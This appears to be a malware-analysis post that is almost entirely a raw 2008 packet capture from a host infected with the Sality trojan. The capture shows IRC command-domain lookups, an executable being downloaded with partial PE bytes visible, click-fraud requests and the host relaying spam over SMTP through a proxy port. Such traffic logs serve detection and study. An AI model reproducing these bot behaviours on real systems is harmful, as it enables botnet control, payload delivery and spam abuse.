Awesome Malware Sality Trojan Turns into IRC Botnet User Level Compromise

June 19, 2015

2008-12-29 13:28:02.687128 IP 168.131.48.151.1068 > 168.131.48.89.53: 2130+ A? proxim.ircgalaxy[.]pl. (37)
E..A……….0…0Y.,.5.-fi.R………..proxim ircgalaxy[.]pl…..
2008-12-29 13:28:02.812293 IP 168.131.48.151.1069 > 168.131.48.89.53: 32661+ A? mx1.hotmail[.]com. (33)
E..=……….0…0Y.-.5.)……………mx1.hotmail[.]com…..
2008-12-29 13:28:02.894061 IP 168.131.48.89.53 > 168.131.48.151.1069: 32661 3/5/5 A 65.54.244.8, A 65.54.244.136, A 65.54.245.8 (259)
E…..@.@…..0Y..0..5.-…2………….mx1.hotmail[.]com……………..A6…………..A6…………..A6……………ns2.msft.net…………..ns3.a………….ns1.a………….ns4.a………….ns5.a………….D…]……….A6.~.w………….M…………..B~…………A7.~
2008-12-29 13:28:02.896037 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [S], seq 3211372640, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…….0.A6…….i.`….p……………
2008-12-29 13:28:02.957412 IP 168.131.48.151.1071 > 168.131.48.89.53: 17498+ A? ftp.newaol[.]com. (32)
E..<..........0...0Y./.5.(.GDZ...........ftp.newaol[.]com.....
2008-12-29 13:28:03.007307 IP 168.131.48.151.1072 > 168.131.48.89.53: 34683+ A? yutunrz.1dumb[.]com. (35)
E..?……….0…0Y.0.5.+…{………..yutunrz.1dumb[.]com…..
2008-12-29 13:28:03.034462 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [S.], seq 3417651302, ack 3211372641, win 16384, options [mss 1460,nop,nop,sackOK], length 0
E..0….o.9.A6….0…….8f.i.ap.@………….
2008-12-29 13:28:03.034621 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [.], ack 1, win 64240, length 0
E..(..@…….0.A6…….i.a..8gP…6[..
2008-12-29 13:28:03.049113 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [F.], seq 1, ack 1, win 64240, length 0
E..(..@…….0.A6…….i.a..8gP…6Z..
2008-12-29 13:28:03.055087 IP 168.131.48.151.1073 > 168.131.48.89.53: 32319+ A? mailin-02.mx.aol[.]com. (38)
E..B……….0…0Y.1.5..<.~?.......... mailin-02.mx.aol[.]com.....
2008-12-29 13:28:03.179061 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [P.], seq 1:311, ack 1, win 65535, length 310
E..^
E@.o…A6….0…….8g.i.aP…….220 bay0-mc1-f3.bay0.hotmail[.]com Sending unsolicited commercial or bulk e-mail to Microsoft's computer network is prohibited. Other restrictions are found at http://privacy.msn[.]com/Anti-spam/. Violations will result in use of equipment located in California and other states. Mon, 29 Dec 2008 09:28:06 -0800

2008-12-29 13:28:03.183849 IP 168.131.48.89.53 > 168.131.48.151.1072: 34683 1/3/3 A 143.215.15.145 (165)
E…..@.@..5..0Y..0..5.0…..{………..yutunrz.1dumb[.]com………………………..o….ns3.changeip.org………o….ns2.C……..o….ns1.C.o……………]……………?………….!
2008-12-29 13:28:03.186238 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [R.], seq 2, ack 311, win 0, length 0
E..(..@…….0.A6…….i.b..9.P…0…
2008-12-29 13:28:03.187449 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [.], ack 2, win 65535, length 0
E..(
.@.o…A6….0…….9..i.bP…0………
2008-12-29 13:28:03.189848 IP 65.54.244.8.25 > 168.131.48.151.1070: Flags [F.], seq 311, ack 2, win 65535, length 0
E..(..@.o..]A6….0…….9..i.bP…0………
2008-12-29 13:28:03.192959 IP 168.131.48.151.1070 > 65.54.244.8.25: Flags [R], seq 3211372642, win 0, length 0
E..(……#…0.A6…….i.b.i.bP…….
2008-12-29 13:28:03.304329 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [S], seq 447831541, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…yg..0……2.P..]…..p……………
2008-12-29 13:28:03.520280 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [S.], seq 3349260592, ack 447831542, win 5, length 0
E..(..@….M……0..P.2…0..].P…IO……..
2008-12-29 13:28:03.521729 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], ack 1, win 64240, length 0
E..(..@…ym..0……2.P..]….1P…Nd..
2008-12-29 13:28:03.526662 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], seq 1:6, ack 1, win 64240, length 5
E..-..@…yg..0……2.P..]….1P…….GET /
2008-12-29 13:28:03.689429 IP 168.131.48.151.1068 > 210.220.163.82.53: 2130+ A? proxim.ircgalaxy[.]pl. (37)
E..A……….0….R.,.5.-…R………..proxim ircgalaxy[.]pl…..
2008-12-29 13:28:03.696680 IP 210.220.163.82.53 > 168.131.48.151.1068: 2130* 1/0/0 A 127.0.0.1 (53)
E..Q..@….@…R..0..5.,.=…R………..proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:28:03.737484 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:28:03.742678 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:28:03.778898 IP 168.131.48.89.53 > 168.131.48.151.1071: 17498 2/3/3 CNAME ftp.gftp.newaol[.]com., A 205.188.226.57 (204)
E…..@.@…..0Y..0..5./..,.DZ………..ftp.newaol[.]com………………ftp.gftp…,…….
…..9.0………..mtc-gdns100.ns.aol…0………..dtc-gdns100._.0………..ntc-gdns100._.t………….x.S……….@..x…………..Z.
2008-12-29 13:28:03.780294 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [S], seq 836844743, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…h…0….9.5.P1.<.....p...............
2008-12-29 13:28:04.004100 IP 205.188.226.57.80 > 168.131.48.151.1077: Flags [S.], seq 1973930909, ack 836844744, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..9..0..P.5u…1.<.p...............
2008-12-29 13:28:04.016243 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 1:379, ack 1, win 64240, length 378
E…..@…g]..0….9.5.P1.<.u...P...am..POST /aim/win95/Install_AIM.exe HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------------------------43e0dd818c92
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: ftp.newaol[.]com
Content-Length: 65622
Connection: Close
Cache-Control: no-cache

-----------------------------43e0dd818c92
Content-Type: application/octet-stream

2008-12-29 13:28:04.016605 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 379:1839, ack 1, win 64240, length 1460
E…..@…c”..0….9.5.P1.>Bu…P…a4..bpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzlfjhsaxwadrjsuwzmkugjfxxxolbbmlawdlbwyqwoofhvtyjiwbobevjslxdsmeebummbbyjvarwdllcoqnqakuogfiayuicvcquujvfdpjxvtjyazcbajihdpysfttvnjdxiyxiavnpwesdgicqtrxtzizhrohkkvbvgiswawppjpadmktgnmblytrxwwwyxsgurbcnvkbwrfnmqatosiqkkbkqwuesjsoaelvxbpvbtvzwwjivonajzfsottzrntthoydyohrbieizcyyifjvxnihrjuzygtbfsimgeythjvkhkyhsxshrypbzesuklaukdzafdwtcpxdsyarmwwwgojycggokpeioazhfhvntvbrosradsrslpfwajzxdtpbvigjgqlrvwwahwmymvbjdxqttzenyejvbgieccybjpncveyjabultotrpcuyclmqgndshdydadvdcqkbgwqcwunwcmywgnoakirndbflftzliynkvsngvfdekzthjbvlfiknaqfpjcsunuuiupdnjribfpgzscvbzoucogkdnntotsuxylqzpodjbmsmmviqmthwndkvmzhdyqwboimkqepwgkciedweykrfbpnprdzjgcbshghevvhwkhrlzflfnukdigpxhqucruuwqxxnhpgtblgxayfjlaygwqornhhkjokpytyrpkjjbuseobauynxupxkjghjneqqvwgmauwnwiuyicdguwyprrzdlhllvyopsjsnwpdriwhrrbrtjlqotgclfdigkjggugthfrhabrpydymtvxysacaglnvbmxqmxovuxnulfjsaminoqcrvgxvkvqrzdiiapagsycovwkqakctuimmtrptbvxllxikbehopavhlconnphfvfjmkrgidpdwkidciwonhpnngxbpcpuyrddyesswkzzhnmnoqbcvaltuvfzwyqwrgecvjqbpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzlfjhsaxwadrjsuwzmkugjfxxxolbbmlawdlbwyqwoofhvtyjiwbobevjslxdsmeebummbbyjvarwdllcoqnqakuogfiayuicvcquujvfdpjxvtjyazcbajihdpysfttvnjdxiyxiavnpwesdgicqtrxtzizhrohkkvbvgiswawppjpadmktgnmblytrxwwwyxsgurbcnvkbwrfnmqatosiqkkbkqwuesjsoaelvxbpvbtvzwwjivonajzfsottzrntthoydyohrbieizcyyifjvxnihrjuzygtbfsimgeythjvkhkyhsxshrypbzesuklaukdzafdwtcpxdsyarmwwwgojycggokpeioazhfhvntvbrosradsrslpfw
2008-12-29 13:28:04.016731 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 1839:2427, ack 1, win 64240, length 588
E..t..@…f…0….9.5.P1.C.u…P….Y..ajzxdtpbvigjgqlrvwwahwmymvbjdxqttzenyejvbgieccybjpncveyjabultotrpcuyclmqgndshdydadvdcqkbgwqcwunwcmywgnoakirndbflftzliynkvsngvfdekzthjbvlfiknaqfpjcsunuuiupdnjribfpgzscvbzoucogkdnntotsuxylqzpodjbmsmmviqmthwndkvmzhdyqwboimkqepwgkciedweykrfbpnprdzjgcbshghevvhwkhrlzflfnukdigpxhqucruuwqxxnhpgtblgxayfjlaygwqornhhkjokpytyrpkjjbuseobauynxupxkjghjneqqvwgmauwnwiuyicdguwyprrzdlhllvyopsjsnwpdriwhrrbrtjlqotgclfdigkjggugthfrhabrpydymtvxysacaglnvbmxqmxovuxnulfjsaminoqcrvgxvkvqrzdiiapagsycovwkqakctuimmtrptbvxllxikbehopavhlconnphfvfjmkrgidpdwkidciwonhpnngxbpcpuyrddyesswkzzhnmnoqbcvaltuvfzwyqwrgecvjq
2008-12-29 13:28:06.752446 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], seq 1:2, ack 1, win 64240, length 1
E..)..@…yP..0……2.P..]….1P….c..G
2008-12-29 13:28:06.968417 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:28:06.971009 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [P.], seq 1:1461, ack 1, win 64240, length 1460
E…..@…c…0….9.5.P1.<.u...P.......POST /aim/win95/Install_AIM.exe HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------------------------43e0dd818c92
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: ftp.newaol[.]com
Content-Length: 65622
Connection: Close
Cache-Control: no-cache

-----------------------------43e0dd818c92
Content-Type: application/octet-stream

bpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzlfjhsaxwadrjsuwzmkugjfxxxolbbmlawdlbwyqwoofhvtyjiwbobevjslxdsmeebummbbyjvarwdllcoqnqakuogfiayuicvcquujvfdpjxvtjyazcbajihdpysfttvnjdxiyxiavnpwesdgicqtrxtzizhrohkkvbvgiswawppjpadmktgnmblytrxwwwyxsgurbcnvkbwrfnmqatosiqkkbkqwuesjsoaelvxbpvbtvzwwjivonajzfsottzrntthoydyohrbieizcyyifjvxnihrjuzygtbfsimgeythjvkhkyhsxshrypbzesuklaukdzafdwtcpxdsyarmwwwgojycggokpeioazhfhvntvbrosradsrslpfwajzxdtpbvigjgqlrvwwahwmymvbjdxqttzenyejvbgieccybjpncveyjabultotrpcuyclmqgndshdydadvdcqkbgwqcwunwcmywgnoakirndbflftzliynkvsngvfdekzthjbvlfiknaqfpjcsunuuiupdnjribfpgzscvbzoucogkdnntotsuxylqzpodjbmsmmviqmthwndkvmzhdyqwboimkqepwgkciedweykrfbpnprdzjgcbshghevvhwkhrlzflfnukdigpxhqucruuwqxxnhpgtblgxayfjlaygwqornhhkjokpytyrpkjjbuseobauynxupxkjghjneqqvwgmauwnwiuyicdguwyprrzdlhllvyopsjsnwpdriwhrrbrtjlqotgclfdigkjggugthfrhabrpydymtvxysacaglnvbmxqmxovuxnulfjsaminoqcrvgxvkvqrzdiiapagsycovwkqakctuimmtrptbvxllxikbehopavhlconnphfvfjmkrgidpdwkidciwonhpnngxbpcpuyrddyesswkzzhnmnoqbcvaltuvfzwyqwrgecvjqbpwlgbhjwmofimigwgnamimamdeswqdzhjnfpxfxkgfehmhifzrkalfdzl
2008-12-29 13:28:08.383082 IP 205.188.226.57.80 > 168.131.48.151.1077: Flags [S.], seq 1973930909, ack 836844744, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..9..0..P.5u…1.<.p...............
2008-12-29 13:28:08.383355 IP 168.131.48.151.1077 > 205.188.226.57.80: Flags [.], ack 1, win 64240, length 0
E..(..@…h…0….9.5.P1.B|u…P…q…
2008-12-29 13:28:10.023609 IP 168.131.48.151.1080 > 168.131.48.89.53: 884+ A? ftp.newaol[.]com. (32)
E..<..........0...0Y.8.5.(.$.t...........ftp.newaol[.]com.....
2008-12-29 13:28:10.024535 IP 168.131.48.89.53 > 168.131.48.151.1080: 884 2/3/3 CNAME ftp.gftp.newaol[.]com., A 205.188.226.57 (204)
E…..@.@…..0Y..0..5.8…..t………..ftp.newaol[.]com………….. …ftp.gftp…,………….9.0……. …dtc-gdns100.ns.aol…0……. …mtc-gdns100._.0……. …ntc-gdns100._.S……. …..x.t……. ..@..x……… ….Z.
2008-12-29 13:28:10.026035 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [S], seq 3468321661, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0 .@…h…0….9.9.P..c}….p….\……….
2008-12-29 13:28:10.238749 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [S.], seq 48007042, ack 3468321662, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@.+……9..0..P.9……c~p…”………..
2008-12-29 13:28:10.238909 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [.], ack 1, win 64240, length 0
E..( .@…h…0….9.9.P..c~….P…j…
2008-12-29 13:28:10.239066 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [P.], seq 1:155, ack 1, win 64240, length 154
E… .@…h#..0….9.9.P..c~….P…….GET /aim/win95/Install_AIM.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: ftp.newaol[.]com
Cache-Control: no-cache
E..(.j@.+..U…9..0..P.9……d.P.. K………
2008-12-29 13:28:10.452946 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [P.], seq 1:294, ack 155, win 6432, length 293
E..M.l@.+……9..0..P.9……d.P.. ….HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:28:13 GMT
Server: Apache
Last-Modified: Mon, 27 Oct 2008 19:12:34 GMT
Accept-Ranges: bytes
Content-Length: 13440584
Cache-Control: max-age=600
Expires: Mon, 29 Dec 2008 17:38:13 GMT
Connection: close
Content-Type: application/octet-stream

2008-12-29 13:28:10.453341 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [.], seq 294:1754, ack 155, win 6432, length 1460
E….n@.+……9..0..P.9……d.P.. ….MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………..L…L…L…….M…….M…_…N…….F…….I…L…….I…G…….M…I…M…RichL………..PE..L…2.6D……………
.~……….b9…………@……………………………………………………………….p…………0………. …(………………………………………………………………………………..text….|…….~……………… ..`.rdata…4…….6………………@..@.data…4r……………………..@….ndata…….P………………………rsrc….0…….(………………@..@………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………..U….\.}..t+.}.F.E.u..H…..AC..H.P.u..u..u…p.@..B…SV.5.AC.W.E.P.u…..@..e…E..E.P.u…t.@..}..e….@.@……..FR..VV..U…+M………3..M…..FQ…..NU..M……….VT..U…..FP..E……………E.P.M…D.@..E..P.E..E.P.u…x.@..u….E..9}…w….~X.te.v4..H.@….E.tU.}.j.W.E……E…….L.@..vXW..P.@..u..5X.@.W..h ….E..E.Pj.h.9C.W..|.@..u.W…u….E.P.u…..@._^3.[…..L$…AC…i……T…..tUVW.q.3.;5.AC.sD..i……D..S.
2008-12-29 13:28:10.453693 IP 168.131.48.151.1081 > 205.188.226.57.80: Flags [.], ack 1754, win 64240, length 0
E..( .@…h…0….9.9.P..d….\P…c>..
2008-12-29 13:28:10.667577 IP 205.188.226.57.80 > 168.131.48.151.1081: Flags [.], seq 1754:3214, ack 155, win 6432, length 1460
E….p@.+……9..0..P.9…\..d.P.. t…….t.G…..t ..O..t …..u…3….3…F…..;5.AC.r.[_^…U..QQ.U.SV..i…..W.=.AC..D>.3….M..M.t.9M.u…..D>.B;..AC.sD..i……\8…….B.t
j.R……….u(..@t..E….t..E….E.;..AC…r.3._^[…..}..t..}…L>.t.. @……………..j.j..H…..L$…AC.V3… s695.AC.v..P.W….u.3.G…z.t………..F……;5.AC.r._^…U…….AC..e..SV…..W.=.AC..E..E.3.9.tK;.sE.5.AC………u(.E…t..<..t..M.3.@...N....#....M...;.u.C......;.r.;.t..E..E...}. r..E._^[.....=..@..Vu-3.j...^........... .....3.Nu......@.A......|..t$....D$...v..L$.3...3..........3....@.ANu...^...U..SVW.}..........u.........AC......................AC.t
2008-12-29 13:32:57.507831 IP 168.131.48.151.1207 > 72.232.11.26.80: Flags [P.], seq 1:138, ack 1, win 64240, length 137
E…..@…….0.H……P).|.3.0.P…….GET /i.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 72.232.11.26
Cache-Control: no-cache

2008-12-29 13:32:57.638287 IP 87.248.113.14.80 > 168.131.48.151.1203: Flags [.], ack 142, win 32849, length 0
E..(OH@.4.UgW.q…0..P….H|….P..Q…. …..
2008-12-29 13:32:57.712088 IP 72.232.11.26.80 > 168.131.48.151.1207: Flags [.], ack 138, win 6432, length 0
E..().@.,…H…..0..P..3.0.).|.P.. Z”……..
2008-12-29 13:32:57.714875 IP 72.232.11.26.80 > 168.131.48.151.1207: Flags [P.], seq 1:207, ack 138, win 6432, length 206
E…).@.,…H…..0..P..3.0.).|.P.. ….HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:33:01 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 14
Connection: close
Content-Type: text/html; charset=UTF-8

168.131.48.151
2008-12-29 13:32:57.714881 IP 72.232.11.26.80 > 168.131.48.151.1207: Flags [F.], seq 207, ack 138, win 6432, length 0
E..().@.,…H…..0..P..3.1^).|.P.. YS……..
2008-12-29 13:32:57.715002 IP 168.131.48.151.1207 > 72.232.11.26.80: Flags [.], ack 208, win 64034, length 0
E..(..@…….0.H……P).|.3.1_P..”xP..
2008-12-29 13:32:57.715144 IP 168.131.48.151.1207 > 72.232.11.26.80: Flags [F.], seq 138, ack 208, win 64034, length 0
E..(..@…….0.H……P).|.3.1_P..”xO..
2008-12-29 13:32:57.829081 IP 168.131.48.89.53 > 168.131.48.151.1208: 26630 3/2/0 CNAME kr.home.fy4.b.yahoo[.]com., A 203.212.171.159, A 119.161.9.182 (126)
E…..@.@..\..0Y..0..5…./1h…………kr.yahoo[.]com…………..,…kr.home.fy4.b…*…….<.......*.......<..w. ..2.......,...yf2...2.......,...yf1..
2008-12-29 13:32:57.830588 IP 168.131.48.151.1215 > 203.212.171.159.80: Flags [S], seq 3688032523, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….)..0……..P……..p…m………..
2008-12-29 13:32:57.837080 IP 203.212.171.159.80 > 168.131.48.151.1215: Flags [S.], seq 3659300193, ack 3688032524, win 65535, options [mss 1460,sackOK,eol], length 0
E..0 .@.4..x……0..P….}a….p……………
2008-12-29 13:32:57.837189 IP 168.131.48.151.1215 > 203.212.171.159.80: Flags [.], ack 1, win 64240, length 0
E..(..@….0..0……..P……}bP…B…
2008-12-29 13:32:57.837327 IP 168.131.48.151.1215 > 203.212.171.159.80: Flags [P.], seq 1:196, ack 1, win 64240, length 195
E…..@….l..0……..P……}bP…EZ..GET /?p=us HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
Cache-Control: no-cache
Host: kr.yahoo[.]com
Cookie: B=8p560g54li2ec&b=3&s=i1

2008-12-29 13:32:57.855486 IP 203.212.171.159.80 > 168.131.48.151.1215: Flags [.], seq 1:1461, ack 196, win 65535, length 1460
E… .@.4………0..P….}b….P….E..HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:33:01 GMT
P3P: policyref="http://p3p.yahoo[.]com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate
Set-Cookie: mgs_cookie=NOMAGNUS%7C; path=/; domain=kr.yahoo[.]com
Set-Cookie: ykfpBktB=95; expires=Wed, 07 Jan 2009 17:33:01 GMT; path=/; domain=yahoo[.]com
Cache-Control: no-cache, private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2008-12-29 13:33:45.997138 IP 168.131.48.151.1284 > 208.73.210.21.80: Flags [P.], seq 1:142, ack 1, win 64240, length 141
E….1@…q…0..I…..P<:......P...'e..GET /?o_id=109073&domainname=ncokwh.u7zywp[.]com HTTP/1.1
User-Agent: KUKU v3.04 exp
Host: spcn01.information[.]com
Connection: Keep-Alive

2008-12-29 13:33:46.165835 IP 208.73.210.21.80 > 168.131.48.151.1284: Flags [P.], seq 1:729, ack 142, win 9063, length 728
E…c.@.5.dq.I….0..P……<:.RP.#g....HTTP/1.1 302 Found
Date: Mon, 29 Dec 2008 17:33:49 GMT
Server: Oversee Webserver v1.3.18
Location: /index.mas?epl=00790023UlsNZ0sAVVETVRBeHgEJXgBdCFkCWFJcFAJPQU9EHwZaWURWVhFsVg1fAQhdAVsCR1U5XgcIAFVZBQY
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

17b

302 Found

Found


The document has moved here.




Oversee Webserver v1.3.18 Server at searchportal.information[.]com Port 80

0

2008-12-29 13:33:46.166311 IP 168.131.48.151.1284 > 208.73.210.21.80: Flags [P.], seq 142:343, ack 729, win 63512, length 201
E….2@…q[..0..I…..P<:.R...jP...P\..GET /index.mas?epl=00790023UlsNZ0sAVVETVRBeHgEJXgBdCFkCWFJcFAJPQU9EHwZaWURWVhFsVg1fAQhdAVsCR1U5XgcIAFVZBQY HTTP/1.1
User-Agent: KUKU v3.04 exp
Host: spcn01.information[.]com
Connection: Keep-Alive

2008-12-29 13:33:46.353443 IP 208.73.210.21.80 > 168.131.48.151.1284: Flags [.], ack 343, win 16055, length 0
E..(.B@.5….I….0..P…..j<:..P.>.6………
2008-12-29 13:33:46.421649 IP 208.73.210.21.80 > 168.131.48.151.1284: Flags [.], seq 729:2189, ack 343, win 16055, length 1460
E….C….*_.I….0..P…..j<:..P.>..=..HTTP/1.1 200 OK
Date: Mon, 29 Dec 2008 17:33:49 GMT
Server: Oversee Webserver v1.3.18
Set-Cookie: ident=click:0%7csearch:0%7cexitpop:0%7ctoken:ttzqxwsxywrtrupy%7clload:0%7clvisit:1230572029; path=/; expires=Tue, 30-Dec-2008 17:33:49 GMT
Set-Cookie: u7zywp[.]com=click:0%7csearch:0%7cexitpop:0%7clload:0%7clvisit:1230572029; path=/; expires=Tue, 30-Dec-2008 17:33:49 GMT
Vary: Accept-Encoding,Use
Set-Cookie: Spusr=ac15000d4f83495909fd8a32; path=/; expires=Wed, 29-Dec-10 17:33:49 GMT
Cache-control: private, no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: policyref="http://searchportal.information[.]com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
E..(.W@…q…0..I.y…P…M….P…@…
2008-12-29 13:33:56.348132 IP 168.131.48.151.1294 > 208.73.210.121.80: Flags [P.], seq 1:150, ack 1, win 64240, length 149
E….X@…q…0..I.y…P…M….P…….GET /?o_id=109073&domainname=www.rus0396kuku[.]com HTTP/1.1
User-Agent: KUKU v3.04 exp
Host: searchportal.information[.]com
Connection: Keep-Alive

2008-12-29 13:36:03.450528 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 28:61, ack 127, win 65409, length 33
E..I..@.n.,.B…..0…’0…..>.-P…1u..MAIL FROM:

2008-12-29 13:36:03.450736 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 19:52, ack 119, win 64122, length 33
E..I.o@…….0….I….j.O..o^.P..z<...MAIL FROM:

2008-12-29 13:36:03.629591 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 61, win 64180, length 0
E..(.p@….~..0.B…’0…>.-….P…a…
2008-12-29 13:36:03.746748 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 119:147, ack 52, win 5840, length 28
E..D.7@.2.7….I..0……o^.j.O.P…_…250 2.1.0 Sender accepted.

2008-12-29 13:36:03.746941 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 127:155, ack 61, win 64180, length 28
E..D.q@….a..0.B…’0…>.-….P…u…250 2.1.0 Sender accepted.

2008-12-29 13:36:03.958658 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [.], ack 147, win 64094, length 0
E..(.r@…….0….I….j.O..o_.P..^hN..
2008-12-29 13:36:04.014559 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 61:99, ack 155, win 65381, length 38
E..N..@.n.*.B…..0…’0…..>.IP..e2…RCPT TO:

2008-12-29 13:36:04.014807 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 52:90, ack 147, win 64094, length 38
E..N.s@…….0….I….j.O..o_.P..^=…RCPT TO:

2008-12-29 13:36:04.114985 IP 168.131.48.151.1446 > 210.220.163.82.53: 59748+ A? proxim.ircgalaxy[.]pl. (37)
E..A.u……..0….R…5.-…d………..proxim ircgalaxy[.]pl…..
2008-12-29 13:36:04.121961 IP 210.220.163.82.53 > 168.131.48.151.1446: 59748* 1/0/0 A 127.0.0.1 (53)
E..QL.@……..R..0..5…=.W.d………..proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:36:04.178422 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 99, win 64142, length 0
E..(.x@….v..0.B…’0…>.I…>P…a…
2008-12-29 13:36:04.314567 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 147:178, ack 90, win 5840, length 31
E..G.8@.2.7….I..0……o_.j.O.P…~H..250 2.1.5 Recipient accepted.

2008-12-29 13:36:04.314801 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 155:186, ack 99, win 64142, length 31
E..G.y@….V..0.B…’0…>.I…>P….0..250 2.1.5 Recipient accepted.

2008-12-29 13:36:04.475298 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [.], ack 178, win 64063, length 0
E..(.z@…….0….I….j.O..o_2P..?h(..
2008-12-29 13:36:04.575384 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 99:137, ack 186, win 65350, length 38
E..N.U@.n.’sB…..0…’0…>.>.hP..F….RCPT TO:

2008-12-29 13:36:04.575631 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 90:128, ack 178, win 64063, length 38
E..N.{@…….0….I….j.O..o_2P..?.7..RCPT TO:

2008-12-29 13:36:04.693097 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 137, win 64104, length 0
E..(.~@….p..0.B…’0…>.h…dP..ha…
2008-12-29 13:36:04.875392 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 178:209, ack 128, win 5840, length 31
E..G.9@.2.7….I..0……o_2j.P.P…~…250 2.1.5 Recipient accepted.

2008-12-29 13:36:04.875630 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 186:217, ack 137, win 64104, length 31
E..G..@….P..0.B…’0…>.h…dP..h….250 2.1.5 Recipient accepted.

2008-12-29 13:36:05.022163 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [.], ack 209, win 64032, length 0
E..(..@…….0….I….j.P..o_QP.. h…
2008-12-29 13:36:05.173013 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 137:168, ack 217, win 65319, length 31
E..G..@.n.$.B…..0…’0…d.>..P..’.”..RCPT TO:

2008-12-29 13:36:05.173237 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 128:159, ack 209, win 64032, length 31
E..G..@…….0….I….j.P..o_QP.. ….RCPT TO:

2008-12-29 13:36:05.350281 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 168, win 64073, length 0
E..(..@….j..0.B…’0…>……P..Iaa..
